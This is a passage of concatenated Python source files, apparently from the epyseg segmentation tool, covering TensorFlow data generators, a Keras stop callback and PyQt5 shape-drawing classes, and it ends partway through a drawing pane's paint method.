z_frames_to_add=self._get_significant_parameter(z_frames_to_add, self.z_frames_to_add),
))
def validation_generator(self, infinite=False):
if infinite:
while True:
for orig, label in self._validation_generator(skip_augment=True):
# bug fix for recent tensorflow that really needs true and pred to be unpacked if single input and output
if len(orig) == 1:
orig = orig[0]
if len(label) == 1:
label = label[0]
yield orig, label
else:
for orig, label in self._validation_generator(skip_augment=True):
# bug fix for recent tensorflow that really needs true and pred to be unpacked if single input and output
if len(orig) == 1:
orig = orig[0]
if len(label) == 1:
label = label[0]
yield orig, label
def train_generator(self, infinite=False):
if infinite:
while True:
for orig, label in self._train_generator(skip_augment=False):
# bug fix for recent tensorflow that really needs true and pred to be unpacked if single input and output
if len(orig) == 1:
orig = orig[0]
if len(label) == 1:
label = label[0]
yield orig, label
else:
for orig, label in self._train_generator(skip_augment=False):
# bug fix for recent tensorflow that really needs true and pred to be unpacked if single input and output
if len(orig) == 1:
orig = orig[0]
if len(label) == 1:
label = label[0]
yield orig, label
def test_generator(self, infinite=False):
if infinite:
while True:
for orig, label in self._test_generator(skip_augment=True):
# bug fix for recent tensorflow that really needs true and pred to be unpacked if single input and output
if len(orig) == 1:
orig = orig[0]
if len(label) == 1:
label = label[0]
yield orig, label
else:
for orig, label in self._test_generator(skip_augment=True):
# bug fix for recent tensorflow that really needs true and pred to be unpacked if single input and output
if len(orig) == 1:
orig = orig[0]
if len(label) == 1:
label = label[0]
yield orig, label
def angular_yielder(self, orig, mask, count):
# mask = self.extra_watershed_mask(mask) # shrink mask to 1 px wide irrespective of transfo
# NB could do here the generations of the nine stacks --> TODO --> would increase size by 9 but it is a good idea I think
# can also copy the code of the other stuff
if count == 0:
# rot 180
return np.rot90(orig, 2, axes=(-3, -2)), np.rot90(mask, 2, axes=(-3, -2))
if count == 1:
# flip hor
return np.flip(orig, -2), np.flip(mask, -2)
if count == 2:
# flip ver
return np.flip(orig, -3), np.flip(mask, -3)
# make it yield the original and the nine versions of it
# --> TODO
# ça marche ça me genere les 9 versions du truc dans tous les sens --> probablement ce que je veux --> tt mettre ici
if count == 3:
# yield np.rot90(orig, axes=(-3, -2)), np.rot90(mask, axes=(-3, -2))
# rot 90
return np.rot90(orig, axes=(-3, -2)), np.rot90(mask, axes=(-3, -2))
if count == 4:
# rot 90_flipped_hor or ver
return np.flip(np.rot90(orig, axes=(-3, -2)), -2), np.flip(np.rot90(mask, axes=(-3, -2)), -2)
if count == 5:
# rot 90_flipped_hor or ver
return np.flip(np.rot90(orig, axes=(-3, -2)), -3), np.flip(np.rot90(mask, axes=(-3, -2)), -3)
if count == 6:
# rot 270
return np.rot90(orig, 3, axes=(-3, -2)), np.rot90(mask, 3, axes=(-3, -2))
def _train_generator(self, skip_augment, first_run=False):
train = MetaGenerator(self.augmenters, shuffle=self.shuffle, batch_size=self.batch_size, gen_type='train')
for out in train.generator(skip_augment, first_run):
try:
# # print(len(out))
# # that works check that all are there and all are possible otherwise skip
# # --> need ensure that width = height
# # need set a parameter to be sure to use it or not and need remove rotation and flip from augmentation list (or not in fact)
# orig, mask = out
# augmentations = 7
# if orig[0].shape[-2] != orig[0].shape[-3]:
# augmentations = 3
# for aug in range(augmentations):
# yield self.angular_yielder(orig, mask, aug)
# yield orig, mask
yield out
except:
# failed to generate output --> continue
continue
def _test_generator(self, skip_augment, first_run=False):
test = MetaGenerator(self.augmenters, shuffle=False, batch_size=self.batch_size, gen_type='test')
for out in test.generator(skip_augment, first_run):
# # yield out
# # print(len(out))
# # that works check that all are there and all are possible otherwise skip
# # --> need ensure that width = height
# # need set a parameter to be sure to use it or not and need remove rotation and flip from augmentation list (or not in fact)
# orig, mask = out
# augmentations = 7
# if orig[0].shape[-2] != orig[0].shape[-3]:
# augmentations = 3
# for aug in range(augmentations):
# yield self.angular_yielder(orig, mask, aug)
# yield orig, mask
yield out
def _validation_generator(self, skip_augment, first_run=False):
valid = MetaGenerator(self.augmenters, shuffle=self.shuffle, batch_size=self.batch_size, gen_type='valid')
for out in valid.generator(skip_augment, first_run):
# # yield out
# # print(len(out))
# # that works check that all are there and all are possible otherwise skip
# # --> need ensure that width = height
# # need set a parameter to be sure to use it or not and need remove rotation and flip from augmentation list (or not in fact)
# orig, mask = out
# augmentations = 7
# if orig[0].shape[-2] != orig[0].shape[-3]:
# augmentations = 3
# for aug in range(augmentations):
# yield self.angular_yielder(orig, mask, aug)
# yield orig, mask
yield out
def predict_generator(self): # TODO can use datagen for now
pass
def __len__(self):
# returns the nb of datasets
if not self.augmenters:
return 0
return len(self.augmenters)
# returns the real nb of batches with the current parameters...
def get_train_length(self, first_run=False):
# need run the train algo once with real tiled data to get the counts
train_generator = self._train_generator(skip_augment=True, first_run=first_run)
nb_batches = 0
for _, _ in train_generator:
nb_batches += 1
return nb_batches
def get_test_length(self, first_run=False):
# need run the train algo once with real tiled data to get the counts
test_generator = self._test_generator(skip_augment=True, first_run=first_run)
nb_batches = 0
for _, _ in test_generator:
nb_batches += 1
return nb_batches
def get_validation_length(self, first_run=False):
# need run the train algo once with real tiled data to get the counts
validation_generator = self._validation_generator(skip_augment=True, first_run=first_run)
nb_batches = 0
for _, _ in validation_generator:
nb_batches += 1
return nb_batches
if __name__ == '__main__':
pass
```
#### File: deeplearning/callbacks/stop.py
```python
import tensorflow.keras as keras
# call this to stop training
class myStopCallback(keras.callbacks.Callback):
def __init__(self):
self.stop_me = False
def on_epoch_begin(self, epoch, logs={}):
if self.stop_me:
self.model.stop_training = True
def on_epoch_end(self, epoch, logs={}):
if self.stop_me:
self.model.stop_training = True
def on_batch_begin(self, batch, logs={}):
if self.stop_me:
self.model.stop_training = True
def on_batch_end(self, batch, logs={}):
if self.stop_me:
self.model.stop_training = True
```
#### File: draw/shapes/circle2d.py
```python
from epyseg.draw.shapes.ellipse2d import *
from epyseg.tools.logger import TA_logger
logger = TA_logger()
class Circle2D(Ellipse2D):
def __init__(self, *args, color=0xFFFF00, fill_color=None, opacity=1., stroke=0.65,line_style=None, **kwargs):
if len(args) == 3:
super(Circle2D, self).__init__(*args, args[-1])
elif len(args) == 4:
logger.error("too many values, square pnly has, x,y and width")
else:
super(Circle2D, self).__init__(*args) # create empty circle
self.setRect(self.rect())
self.color = color
self.fill_color = fill_color
self.stroke = stroke
self.opacity = opacity
self.line_style = line_style
# rotation
# self.theta = theta
def add(self, *args):
p1 = args[0]
p2 = args[1]
rect = self.rect()
x = p2.x()
y = p2.y()
x2 = p1.x()
y2 = p1.y()
if p1.x() < p2.x():
x = p1.x()
x2 = p2.x()
if p1.y() < p2.y():
y = p1.y()
y2 = p2.y()
w = abs(x - x2)
h = abs(y - y2)
if w < h:
rect.setWidth(h)
rect.setHeight(h)
else:
rect.setWidth(w)
rect.setHeight(w)
rect.setX(x)
rect.setY(y)
self.setRect(rect)
self.isSet = True
if __name__ == '__main__':
test = Circle2D(0, 0, 100)
# print(test.x(), test.y(), test.width(), test.height())
print(test.contains(QPointF(50, 50)))
print(test.contains(QPointF(15, 15)))
print(test.contains(QPointF(-1, -1)))
print(test.contains(QPointF(0, 0)))
print(test.contains(QPointF(100, 100)))
print(test.contains(QPointF(100, 100.1)))
print(test.x())
print(test.y())
print(test.translate(QPoint(10, 10)))
print(test.x())
print(test.y())
# p1 = test.p1()
# print(p1.x(), p1.y())
# p2 = test.p2()
# print(p2.x(), p2.y())
# print(test.arrow)
# print(test.length()) # sqrt 2 --> 141
# # if it's an arrow I can add easily all the stuff I need
#
# test = Rect2D(0, 0, 1, 1)
# p1 = test.p1()
# print(p1.x(), p1.y())
# p2 = test.p2()
# print(p2.x(), p2.y())
# print(test.arrow)
# import math
# print(test.length() == math.sqrt(2)) # sqrt 2
#
# test2 = Rect2D()
# p1 = test2.p1()
# print(p1.x(), p1.y())
# p2 = test2.p2()
# print(p2.x(), p2.y())
# print(test2.arrow)
```
#### File: draw/shapes/ellipse2d.py
```python
from PyQt5 import QtWidgets
from PyQt5.QtCore import QPoint, QPointF, Qt, QRectF
from PyQt5.QtGui import QBrush, QPen, QColor, QTransform
from epyseg.tools.logger import TA_logger
logger = TA_logger()
class Ellipse2D(QtWidgets.QGraphicsEllipseItem):
isSet = False
def __init__(self, *args, color=0xFFFF00, fill_color=None, opacity=1., stroke=0.65, line_style=None,theta=0, **kwargs):
super(Ellipse2D, self).__init__(*args)
if not args:
self.isSet = False
else:
self.isSet = True
self.setRect(self.rect())
self.color = color
self.fill_color = fill_color
self.stroke = stroke
self.opacity = opacity
self.scale = 1
self.translation = QPointF()
self.line_style = line_style
# rotation
self.theta = theta
def set_rotation(self, theta):
self.theta = theta
def set_opacity(self, opacity):
self.opacity = opacity
def set_line_style(self,style):
'''allows lines to be dashed or dotted or have custom pattern
:param style: a list of numbers or any of the following Qt.SolidLine, Qt.DashLine, Qt.DashDotLine, Qt.DotLine, Qt.DashDotDotLine but not Qt.CustomDashLine, Qt.CustomDashLine is assumed by default if a list is passed in. None is also a valid value that resets the line --> assume plain line
:return:
'''
self.line_style = style
# if style is a list then assume custom pattern otherwise apply solidline
def draw(self, painter, draw=True):
if self.color is None and self.fill_color is None:
return
if draw:
painter.save()
painter.setOpacity(self.opacity)
if self.color is not None:
pen = QPen(QColor(self.color))
if self.stroke is not None:
pen.setWidthF(self.stroke)
if self.line_style is not None:
if self.line_style in [Qt.SolidLine, Qt.DashLine, Qt.DashDotLine, Qt.DotLine, Qt.DashDotDotLine]:
pen.setStyle(self.line_style)
elif isinstance(self.line_style, list):
pen.setStyle(Qt.CustomDashLine)
pen.setDashPattern(self.line_style)
painter.setPen(pen)
else:
painter.setPen(Qt.NoPen)
if self.fill_color is not None:
painter.setBrush(QBrush(QColor(self.fill_color)))
if draw:
rect_to_plot = self.rect().adjusted(0, 0, 0, 0)
if self.scale is not None and self.scale != 1:
# TODO KEEP THE ORDER THIS MUST BE DONE THIS WAY OR IT WILL GENERATE PLENTY OF BUGS...
new_width = rect_to_plot.width() * self.scale
new_height = rect_to_plot.height() * self.scale
# TODO BE EXTREMELY CAREFUL AS SETX AND SETY CAN CHANGE WIDTH AND HEIGHT --> ALWAYS TAKE SIZE BEFORE OTHERWISE THERE WILL BE A PB AND ALWAYS RESET THE SIZE WHEN SETX IS CALLED!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# Sets the left edge of the rectangle to the given x coordinate. May change the width, but will never change the right edge of the rectangle. --> NO CLUE WHY SHOULD CHANGE WIDTH THOUGH BUT BE CAREFUL!!!
rect_to_plot.setX(rect_to_plot.x() * self.scale)
rect_to_plot.setY(rect_to_plot.y() * self.scale)
rect_to_plot.setWidth(new_width)
rect_to_plot.setHeight(new_height)
if self.translation is not None:
rect_to_plot.translate(self.translation)
# if self.color is not None:
# painter.drawRect(rect_to_plot)
# else:
# painter.fillRect(rect_to_plot, QColor(self.fill_color))
if self.theta is not None and self.theta != 0:
painter.translate(rect_to_plot.center())
painter.rotate(self.theta)
painter.translate(-rect_to_plot.center())
painter.drawEllipse(rect_to_plot)
painter.restore()
# def fill(self, painter, draw=True):
# if self.fill_color is None:
# return
# if draw:
# painter.save()
# painter.setBrush(QBrush(QColor(self.fill_color)))
# painter.setOpacity(self.opacity)
# if draw:
# painter.drawEllipse(self.rect())
# painter.restore()
#
# # TODO pb will draw the shape twice.... ---> because painter drawpolygon is called twice
#
# def drawAndFill(self, painter):
# painter.save()
# self.draw(painter, draw=False)
# self.fill(painter, draw=False)
# painter.drawEllipse(self.rect())
# painter.restore()
def translate(self, translation):
self.moveBy(translation.x(), translation.y())
rect = self.rect()
rect.translate(translation.x(), translation.y())
self.setRect(rect)
def add(self, *args):
p1 = args[0]
p2 = args[1]
rect = self.rect()
rect.setWidth(abs(p1.x()-p2.x()))
rect.setHeight(abs(p1.y()-p2.y()))
x = p2.x()
y = p2.y()
if p1.x() < p2.x():
x = p1.x()
if p1.y() < p2.y():
y = p1.y()
rect.setX(x)
rect.setY(y)
self.setRect(rect)
self.isSet = True
def boundingRect(self):
# should I return the scaled version or the orig --> think about it...
rect_to_plot = self.rect().adjusted(0, 0, 0, 0)
try:
# print('tada')
if self.theta is not None and self.theta!=0:
# print('entering')
center = rect_to_plot.center()
# print('entering2')
t = QTransform().translate(center.x(), center.y()).rotate(self.theta).translate(-center.x(),
-center.y())
# print('entering3')
# self.setTransform(t)
# self.transform()
# transformed = QRectF(self.rect())
# print('entering5', transformed)
# self.resetTransform()
# print('entering5', rect_to_plot)
# print('entering4')
transformed = t.mapRect(rect_to_plot)
# self.setTransform(t)
# self.transform()
#
# print(self.shape().boundingRect())
#
# # print(self.rect(), transformed)
#
# transformed = QRectF(self.shape().boundingRect())
# # self.resetTransform()
# not perfect but ok for now though --> bounds are not sharp at the edges upon rotation
# print('entering45', transformed)
return transformed
except:
pass
return rect_to_plot
def get_P1(self):
return self.boundingRect().topLeft()
def set_P1(self, point):
rect = self.rect()
width = rect.width()
height = rect.height()
rect.setX(point.x())
rect.setY(point.y())
# required due to setX changing width and sety changing height
rect.setWidth(width)
rect.setHeight(height)
self.setRect(rect)
def set_to_scale(self, factor):
self.scale = factor
def set_to_translation(self, translation):
self.translation = translation
if __name__ == '__main__':
# ça marche --> voici deux examples de shapes
test = Ellipse2D(0, 0, 100, 100)
# print(test.x(), test.y(), test.width(), test.height())
print(test.contains(QPointF(50, 50)))
print(test.contains(QPointF(15, 15)))
print(test.contains(QPointF(-1, -1)))
print(test.contains(QPointF(0, 0)))
print(test.contains(QPointF(100, 100)))
print(test.contains(QPointF(100, 100.1)))
print(test.x())
print(test.y())
print(test.translate(QPoint(10, 10)))
print(test.x())
print(test.y())
# p1 = test.p1()
# print(p1.x(), p1.y())
# p2 = test.p2()
# print(p2.x(), p2.y())
# print(test.arrow)
# print(test.length()) # sqrt 2 --> 141
# # if it's an arrow I can add easily all the stuff I need
#
# test = Rect2D(0, 0, 1, 1)
# p1 = test.p1()
# print(p1.x(), p1.y())
# p2 = test.p2()
# print(p2.x(), p2.y())
# print(test.arrow)
# import math
# print(test.length() == math.sqrt(2)) # sqrt 2
#
# test2 = Rect2D()
# p1 = test2.p1()
# print(p1.x(), p1.y())
# p2 = test2.p2()
# print(p2.x(), p2.y())
# print(test2.arrow)
```
#### File: draw/shapes/line2d.py
```python
from PyQt5.QtCore import QPointF, QLineF, QRectF, QPoint, Qt
from PyQt5.QtGui import QBrush, QPen, QColor, QTransform
from math import sqrt
from epyseg.tools.logger import TA_logger
logger = TA_logger()
class Line2D(QLineF):
def __init__(self, *args, color=0xFFFF00, opacity=1., stroke=0.65, arrow=False, line_style=None, theta=0, **kwargs):
super(Line2D, self).__init__(*args)
if not args:
self.isSet = False
else:
self.isSet = True
self.arrow = arrow
self.color = color
self.stroke = stroke
self.opacity = opacity
self.scale = 1
self.translation = QPointF()
self.line_style = line_style
# rotation
self.theta = theta
def set_rotation(self, theta):
self.theta = theta
def set_opacity(self, opacity):
self.opacity = opacity
def set_line_style(self,style):
'''allows lines to be dashed or dotted or have custom pattern
:param style: a list of numbers or any of the following Qt.SolidLine, Qt.DashLine, Qt.DashDotLine, Qt.DotLine, Qt.DashDotDotLine but not Qt.CustomDashLine, Qt.CustomDashLine is assumed by default if a list is passed in. None is also a valid value that resets the line --> assume plain line
:return:
'''
self.line_style = style
# if style is a list then assume custom pattern otherwise apply solidline
def draw(self, painter, draw=True):
if self.color is None:
return
if draw:
painter.save()
pen = QPen(QColor(self.color))
if self.stroke is not None:
pen.setWidthF(self.stroke)
if self.line_style is not None:
if self.line_style in [Qt.SolidLine, Qt.DashLine, Qt.DashDotLine, Qt.DotLine, Qt.DashDotDotLine]:
pen.setStyle(self.line_style)
elif isinstance(self.line_style, list):
pen.setStyle(Qt.CustomDashLine)
pen.setDashPattern(self.line_style)
painter.setPen(pen)
painter.setOpacity(self.opacity)
if draw:
# clone the line
line_to_plot = self.translated(0, 0)
if self.scale is not None and self.scale != 1:
p1 = line_to_plot.p1()
p2 = line_to_plot.p2()
line_to_plot.setP1(QPointF(p1.x()*self.scale, p1.y()*self.scale))
line_to_plot.setP2(QPointF(p2.x()*self.scale, p2.y()*self.scale))
if self.translation is not None:
line_to_plot.translate(self.translation)
# print(line_to_plot)
if self.theta is not None and self.theta != 0:
painter.translate(line_to_plot.center())
painter.rotate(self.theta)
painter.translate(-line_to_plot.center())
painter.drawLine(line_to_plot)
painter.restore()
#
# def fill(self, painter, draw=True):
# if draw:
# painter.save()
# if self.fill_color is None:
# return
# painter.setBrush(QBrush(QColor(self.fill_color)))
# painter.setOpacity(self.opacity)
# if draw:
# painter.drawLine(self)
# painter.restore()
#
# def drawAndFill(self, painter):
# painter.save()
# self.draw(painter, draw=False)
# self.fill(painter, draw=False)
# painter.drawLine(self)
# painter.restore()
def contains(self, *args):
x = 0
y = 0
if isinstance(args[0], QPoint) or isinstance(args[0], QPointF):
x = args[0].x()
y = args[0].y()
else:
x = args[0]
y = args[1]
return self.distToSegment(QPointF(x, y), self.p1(), self.p2()) < 10 and self.boundingContains(*args)
def lineFromPoints(self, x1, y1, x2, y2):
a = y2 - y1
b = x1 - x2
c = a * x1 + b * y1
return (a, b, c)
def len(self, v, w):
return (v.x() - w.x()) ** 2 + (v.y() - w.y()) ** 2
def distToSegment(self, p, v, w):
l2 = self.len(v, w)
if l2 == 0:
return self.len(p, v)
t = ((p.x() - v.x()) * (w.x() - v.x()) + (p.y() - v.y()) * (w.y() - v.y())) / l2
t = max(0, min(1, t))
return sqrt(self.len(p, QPointF(v.x() + t * (w.x() - v.x()), v.y() + t * (w.y() - v.y()))))
def boundingContains(self, *args):
return self.boundingRect().contains(*args)
# def boundingRect(self, scaled=True):
# scale = 1
# if not scaled and self.scale is not None:
# scale = self.scale
# return QRectF(min(self.p1().x(), self.p2().x()) * scale, min(self.p1().y(), self.p2().y()) * scale,
# abs(self.p2().x() - self.p1().x()) * scale, abs(self.p2().y() - self.p1().y()) * scale)
# TODO handle scale etc
def boundingRect(self):
rect = QRectF(min(self.p1().x(), self.p2().x()), min(self.p1().y(), self.p2().y()),
abs(self.p2().x() - self.p1().x()), abs(self.p2().y() - self.p1().y()))
try:
# print('tada')
if self.theta is not None and self.theta != 0:
# print('entering')
center = rect.center()
# print('entering2')
t = QTransform().translate(center.x(), center.y()).rotate(self.theta).translate(-center.x(),
-center.y())
# print('entering3')
# transformed = self.setTransform(t)
# print('entering4')
# print(transformed)
# print(QRectF(min(transformed.p1().x(), transformed.p2().x()), min(transformed.p1().y(), transformed.p2().y()),
# abs(transformed.p2().x() - transformed.p1().x()), abs(transformed.p2().y() - transformed.p1().y())))
# return QRectF(min(transformed.p1().x(), transformed.p2().x()), min(transformed.p1().y(), transformed.p2().y()),
# abs(transformed.p2().x() - transformed.p1().x()), abs(transformed.p2().y() - transformed.p1().y()))
# copy.setT
# print('entering')
# t = QTransform().translate( center.x(), center.y()).rotate(self.theta).translate(-center.x(), -center.y())
# # print('entersd')
transformed = t.map( self) #// mapRect() returns the bounding rect of the rotated rect
# print('rotated',rotatedRect )
# return rotatedRect
return QRectF(min(transformed.p1().x(), transformed.p2().x()),
min(transformed.p1().y(), transformed.p2().y()),
abs(transformed.p2().x() - transformed.p1().x()), abs(transformed.p2().y() - transformed.p1().y()))
except:
pass
return rect
def add(self, *args):
point = args[1]
self.setP2(point)
self.isSet = True
def set_to_scale(self, factor):
self.scale = factor
def set_to_translation(self, translation):
self.translation = translation
def get_P1(self):
return self.boundingRect().topLeft()
# faut pas utiliser ça sinon pbs --> car en fait ce que je veux c'est postionned le point et pas le setter
def set_P1(self, point):
current_pos = self.boundingRect().topLeft()
self.translate(point.x() - current_pos.x(), point.y() - current_pos.y())
# self.translate(self.translation)
# if not args:
# logger.error("no coordinate set...")
# return
# if len(args) == 1:
# self.setP1(args[0])
# else:
# self.setP1(QPointF(args[0], args[1]))
# def set_P2(self,*args):
# if not args:
# logger.error("no coordinate set...")
# return
# if len(args) == 1:
# self.setP2(args[0])
# else:
# self.setP2(QPointF(args[0], args[1]))
def erode(self, nb_erosion=1):
self.__computeNewMorphology(sizeChange=-nb_erosion)
def dilate(self, nb_dilation=1):
self.__computeNewMorphology(sizeChange=nb_dilation)
def __computeNewMorphology(self, sizeChange=1):
currentBoundingRect = self.boundingRect()
curWidth = currentBoundingRect.width()
finalWitdth = curWidth + 2. * sizeChange
if (finalWitdth < 1):
finalWitdth = 1
center2D = QPointF(currentBoundingRect.center().x(), currentBoundingRect.center().y())
scale = finalWitdth / self.boundingRect(scaled=False).width()# divide by original width
print('new scale', scale)
self.set_to_scale(scale)
# need translate according to center otherwise ok
# self.setCenter(center2D)
if __name__ == '__main__':
# ça marche --> voici deux examples de shapes
test = Line2D(0, 0, 100, 100, arrow=True)
print(test.lineFromPoints(0, 0, 100, 100))
print(test.contains(0, 0)) # true
print(test.contains(10, 10)) # true
print(test.contains(-10, -10)) # false # on line with that equation but outside range
print(test.contains(0, 18)) # false
p1 = test.p1()
print(p1.x(), p1.y())
p2 = test.p2()
print(p2.x(), p2.y())
print(test.arrow)
print(test.length()) # sqrt 2 --> 141
# if it's an arrow I can add easily all the stuff I need
test = Line2D(0, 0, 1, 1)
p1 = test.p1()
print(p1.x(), p1.y())
p2 = test.p2()
print(p2.x(), p2.y())
print(test.arrow)
import math
print(test.length() == sqrt(2)) # sqrt 2
test2 = Line2D()
p1 = test2.p1()
print(p1.x(), p1.y())
p2 = test2.p2()
print(p2.x(), p2.y())
print(test2.arrow)
```
#### File: draw/shapes/txt2d.py
```python
from PyQt5 import QtCore
from PyQt5.QtCore import QPointF, QRect
from PyQt5.QtGui import QTextDocument, QTextOption
from PyQt5.QtGui import QPainter, QImage, QColor, QFont
import sys
from PyQt5 import QtGui
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QApplication
from epyseg.draw.shapes.rect2d import Rect2D
# log errors
from epyseg.tools.logger import TA_logger
logger = TA_logger()
class TAText2D(Rect2D):
# TODO add bg to it so that it can be drawn
def __init__(self, text=None, doc=None, opacity=1., *args, **kwargs):
if doc is not None and isinstance(doc, QTextDocument):
self.doc = doc
self.doc.setDocumentMargin(0) # important so that the square is properly placed
else:
self.doc = QTextDocument()
self.doc.setDocumentMargin(0) # important so that the square is properly placed
textOption = self.doc.defaultTextOption()
textOption.setWrapMode(QTextOption.NoWrap)
self.doc.setDefaultTextOption(textOption)
if text is not None:
self.doc.setHtml(text)
self.isSet = True
self.doc.adjustSize()
size = self.getSize()
super(TAText2D, self).__init__(0, 0, size.width(), size.height())
self.opacity = opacity
def set_opacity(self, opacity):
self.opacity = opacity
def setText(self, html):
self.doc.setHtml(html)
self.doc.adjustSize()
size = self.getSize()
self.setWidth(size.width(), size.height())
def setDoc(self, doc):
self.doc = doc
self.doc.setDocumentMargin(0)
self.doc.adjustSize()
size = self.getSize()
self.setWidth(size.width(), size.height())
def draw(self, painter):
painter.save()
painter.setOpacity(self.opacity)
painter.translate(self.x(), self.y())
self.doc.drawContents(painter)
painter.restore()
# maybe activate this upon debug
# painter.save()
# painter.setPen(QtCore.Qt.red)
# painter.drawRect(self)
# painter.restore()
def boundingRect(self):
return self
def getSize(self):
return self.doc.size()
def getWidth(self):
return self.boundingRect().width()
def getHeight(self):
return self.boundingRect().height()
def setText(self, text):
self.doc.setHtml(text)
size = self.size()
self.setWidth(size.width(), size.height())
def set_P1(self, *args):
if not args:
logger.error("no coordinate set...")
return
if len(args) == 1:
self.moveTo(args[0].x(), args[0].y())
else:
self.moveTo(QPointF(args[0], args[1]))
def get_P1(self):
return QPointF(self.x(), self.y())
def getPlainText(self):
return self.doc.toPlainText()
def getHtmlText(self):
return self.doc.toHtml()
if __name__ == '__main__':
# this could be a pb ...
app = QApplication(sys.argv)# IMPORTANT KEEP !!!!!!!!!!!
# window = MyWidget()
# window.show()
# ça marche car ça override la couleur par defaut du truc
# c'est parfait et 2000X plus facile que ds java --> cool
html = '<!DOCTYPE html> <html> <font color=red> <head> <title>Font Face</title> </head> <body> <font face = "Symbol" size = "5">Symbol</font><br /> <font face = "Times New Roman" size = "5">Times New Roman</font><br /> <font face = "Verdana" size = "5">Verdana</font><br /> <font face = "Comic sans MS" size =" 5">Comic Sans MS</font><br /> <font face = "WildWest" size = "5">WildWest</font><br /> <font face = "Bedrock" size = "5">Bedrock</font><br /> </body> </html>'
# html = "<font color=blue size=24>this is a test<sup>2</sup><br></font><font color=green size=12>continued<sub>1</sub><br></font><font color=white size=12>test greek <font face='Symbol' size=32>a</font> another α<font face='Arial' color='Orange'>I am a sentence!</font>"
text = TAText2D(html)
# hexagon.append(QPointF(10, 20))
print(text)
# print(hexagon.translate(10, 20)) # why none ???
# translate and so on can all be saved...
image = QImage('./../data/handCorrection.png')
# image = QImage(QSize(400, 300), QImage.Format_RGB32)
painter = QPainter()
painter.begin(image)
# painter.setOpacity(0.3);
painter.drawImage(0, 0, image)
painter.setPen(QtCore.Qt.blue)
text.opacity = 0.7
painter.translate(10, 20)
painter.setPen(QColor(168, 34, 3))
text.draw(painter) # ça marche pourrait overloader ça avec du svg
painter.drawRect(text)# try to draw the bounds
# painter.setPen(QtCore.Qt.green)
# painter.setFont(QFont('SansSerif', 50))
painter.setFont(QFont('Decorative', 10))
# painter.drawText(256, 256, "this is a test")
# nothing works it just doesn't draw for unknown reason ????
# painter.drawText(QRect(60,60,256,256), Qt.AlignCenter, "this is a test")
painter.setPen(QtGui.QColor(200, 0, 0))
# painter.drawText(20, 20, "MetaGenerator") # fait planter le soft --> pkoi exit(139) ...
painter.drawText(QRect(60,60,256,256), Qt.AlignCenter, "Text centerd in the drawing area")
# painter.drawText(QRect(100, 100, 200, 100), "Text you want to draw...");
print('here')
painter.end()
# image = QImage(QSize(400, 300), QImage::Format_RGB32);
# QPainter
# painter( & image);
# painter.setBrush(QBrush(Qt::green));
# painter.fillRect(QRectF(0, 0, 400, 300), Qt::green);
# painter.fillRect(QRectF(100, 100, 200, 100), Qt::white);
# painter.setPen(QPen(Qt::black));
# painter.save()
# painter.setCompositionMode(QtGui.QPainter.CompositionMode_Clear)
# painter.eraseRect(r)
# painter.restore()
print('saving', './../trash/test_pyQT_draw_text.png')
image.save('./../trash/test_pyQT_draw_text.png', "PNG")
# split text and find bounding rect of the stuff --> so that it is well positioned
# or do everything in svg and just show what's needed ???
#pas mal TODO faire une classe drawsmthg qui dessine n'importe quelle forme que l'on lui passe avec des parametres de couleur, transparence, ...
# tt marche aps mal ça va très vite
sys.exit(0)
```
#### File: draw/widgets/vectorial.py
```python
from PyQt5 import QtCore
from epyseg.draw.shapes.polygon2d import Polygon2D
from epyseg.draw.shapes.line2d import Line2D
from epyseg.draw.shapes.rect2d import Rect2D
from epyseg.draw.shapes.square2d import Square2D
from epyseg.draw.shapes.ellipse2d import Ellipse2D
from epyseg.draw.shapes.circle2d import Circle2D
from epyseg.draw.shapes.freehand2d import Freehand2D
from epyseg.draw.shapes.point2d import Point2D
from epyseg.draw.shapes.polyline2d import PolyLine2D
from epyseg.draw.shapes.image2d import Image2D
from PyQt5.QtCore import QPointF, QRectF
# logging
from epyseg.tools.logger import TA_logger
logger = TA_logger()
class VectorialDrawPane:
def __init__(self, active=False, demo=False, scale=1.0, drawing_mode=False):
self.shapes = []
self.currently_drawn_shape = None
self.shape_to_draw = None
self.selected_shape = []
self.active = active
self.scale = scale
self.drawing_mode = drawing_mode
if demo:
self.shapes.append(Polygon2D(0, 0, 10, 0, 10, 20, 0, 20, 0, 0, color=0x00FF00))
self.shapes.append(
Polygon2D(100, 100, 110, 100, 110, 120, 10, 120, 100, 100, color=0x0000FF, fill_color=0x00FFFF,
stroke=2))
self.shapes.append(Line2D(0, 0, 110, 100, color=0xFF0000, stroke=3))
self.shapes.append(Rect2D(200, 150, 250, 100, stroke=10))
self.shapes.append(Square2D(300, 260, 250, stroke=3))
self.shapes.append(Ellipse2D(0, 50, 600, 200, stroke=3))
self.shapes.append(Circle2D(150, 300, 30, color=0xFF0000))
self.shapes.append(PolyLine2D(10, 10, 20, 10, 20, 30, 40, 30, color=0xFF0000, stroke=2))
self.shapes.append(PolyLine2D(10, 10, 20, 10, 20, 30, 40, 30, color=0xFF0000, stroke=2))
self.shapes.append(Point2D(128, 128, color=0xFF0000, stroke=6))
self.shapes.append(Point2D(128, 128, color=0x00FF00, stroke=1))
self.shapes.append(Point2D(10, 10, color=0x000000, stroke=6))
img0 = Image2D('./../data/counter/00.png')
img1 = Image2D('./../data/counter/01.png')
img2 = Image2D('./../data/counter/02.png')
img3 = Image2D('./../data/counter/03.png')
img4 = Image2D('./../data/counter/04.png')
img5 = Image2D('./../data/counter/05.png')
img6 = Image2D('./../data/counter/06.png')
img7 = Image2D('./../data/counter/07.png')
img8 = Image2D('./../data/counter/08.png')
img9 = Image2D('./../data/counter/09.png')
img10 = Image2D('./../data/counter/10.png')
row = img1 + img2 + img10
self.shapes.append(row)
row2 = img4 + img5
fig = row / row2
# fig = Column(row, row2)
#self.shapes.append(fig)
self.drawing_mode = True
# self.shape_to_draw = Line2D
# self.shape_to_draw = Rect2D
# self.shape_to_draw = Square2D
# self.shape_to_draw = Ellipse2D
# self.shape_to_draw = Circle2D
# self.shape_to_draw = Point2D # ok maybe small centering issue
# self.shape_to_draw = Freehand2D
# self.shape_to_draw = PolyLine2D
# self.shape_to_draw = Polygon2D
import random
drawing_methods = [Line2D, Rect2D, Square2D, Ellipse2D, Circle2D, Point2D, Freehand2D, PolyLine2D, Polygon2D]
self.shape_to_draw = random.choice(drawing_methods)
# TODO freehand drawing
# TODO broken line --> need double click for end
def paintEvent(self, *args):
painter = args[0]
visibleRect = None
if len(args) >= 2:
visibleRect = args[1]
painter.save()
if self.scale != 1.0:
painter.scale(self.scale, self.scale)
for shape in self.shapes:
